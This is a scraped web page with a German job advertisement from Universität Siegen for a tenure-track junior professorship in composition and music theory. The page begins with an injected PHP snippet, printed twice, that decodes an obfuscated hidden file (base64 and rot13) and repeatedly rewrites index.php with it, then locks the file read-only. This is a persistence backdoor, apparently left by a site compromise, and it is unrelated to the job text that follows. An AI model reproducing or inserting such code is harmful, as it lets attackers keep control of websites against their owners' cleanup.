$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Job | Juniorprofessur (Tenure Track) “Komposition und Musiktheorie in postdigitalen Bildungsräumen” – Auditive Medienkulturen

Job | Juniorprofessur (Tenure Track) “Komposition und Musiktheorie in postdigitalen Bildungsräumen”

Arbeitgeber: Universität Siegen
Arbeitstelle: Fakultät II: Bildung – Architektur – Künste, Department Kunst und Musik
Ort: Siegen
Bewerbungsschluss: 17.06.2022

For an English version please see the link below!


In der Fakultät II (Bildung – Architektur – Künste) der Universität Siegen ist im Department Kunst und Musik eine Juniorprofessur (Bes.-Gr. W1 LBesG NRW) “Komposition und Musiktheorie in postdigitalen Bildungsräumen” mit Tenure Track auf eine unbefristete W2-Universitätsprofessur zum nächstmöglichen Zeitpunkt zu besetzen.

Diese Tenure-Track-Professur wird durch das Bund-Länder-Programm zur Förderung des wissenschaftlichen Nachwuchses (Tenure-Track-Programm) gefördert. Die Ausschreibung richtet sich daher insbesondere an den wissenschaftlichen Nachwuchs in einer frühen Karrierephase.

Innerhalb der Fakultät II: Bildung-Architektur-Künste vertritt das Fach Musik einen Fokus auf Musiken des 20. und 21. Jahrhunderts, die hinsichtlich ihrer Diversität in globalisierten Gesellschaften und entlang von Transformationsdynamiken der Digitalisierung künftig noch stärker multi- und interdisziplinär bearbeitet werden sollen. Dabei orientiert sich musikbezogene Forschung und Lehre am Ideal wechselseitiger Wirkung von Praxis und Reflexion. Die bestehenden Schwerpunkte des Faches sollen in der Musiktheorie durch einen weiteren von der Stelleninhaberin bzw. dem Stelleninhaber zu konturierenden Schwerpunkt im Bereich Komposition/Produktion erweitert werden; dabei wird ein Fokus auf die Auseinandersetzung mit Aspekten elektronischer Musik bzw. von Digitalität erwartet. Die Stelleninhaber:in soll ihre/seine Fachgebiete in Lehre und Forschung perspektivisch in ihrer ganzen Breite und interdisziplinären Vernetztheit vertreten.

Im Hinblick auf die aktuelle Lehre in allen Lehramtsstudiengängen wird eine gesteigerte Kohärenz von künstlerischen, wissenschaftlichen und pädagogischen Qualifikationen angestrebt (ein fachwissenschaftlicher Studiengang ist in Diskussion). In den involvierten Studiengängen soll das Portfolio durch Lehr-/Lerninhalte zur Musikproduktion erweitert werden, auch in Hinsicht auf den künstlerischen Unterricht.

Aufgabengebiet und Einstellungsvoraussetzungen

Die Stelle beinhaltet:

  • Lehre in allen Studiengängen mit Beteiligung des Faches Musik
  • Entwicklung von innovativen Lehr-/Lerninhalten inklusive der Weiterentwicklung von Musiktheorien und Praktiken der Gehörbildung; dabei soll der Blick über die
    klassische westliche Kunstmusik hinausgehend auch populäre Kulturen berücksichtigen
  • Mitwirkung bei künstlerisch-experimentellen Aktivitäten im Fach und Entwicklung eigener Projekte
  • Aufbau eines praxisorientierten Forschungsbereichs unter Berücksichtigung von Digitalisierung und Digitalität

Ewartet wird:

  • ein abgeschlossenes künstlerisches und/oder wissenschaftliches Hochschulstudium mit mindestens zwei der folgenden Schwerpunkte: Komposition, Musiktheorie, Musikproduktion
  • pädagogische Eignung
  • besondere Befähigung zur künstlerischen oder – vorzugsweise – wissenschaftlichen Arbeit (Promotion oder äquivalente künstlerische Qualifikation)
  • Erfahrungen in den Bereichen Producing (Recording, Editing, Mixing etc.) oder DJing oder elektronischer Komposition oder Songwriting, Entwicklung und Spielpraxis virtueller Instrumente oder Musik-Apps
  • Erfahrungen im Umgang mit Lerngruppen, möglichst Lehrerfahrungen im Hochschulbereich
  • ein Forschungsvorhaben im Bereich Musikproduktion und Vermittlung oder digitaler Musikpraxen

Weitere Informationen:

Deutsch: https://jobs.uni-siegen.de/content/Professoren/?locale=de_DE

English: https://jobs.uni-siegen.de/content/Professoren/?locale=en_US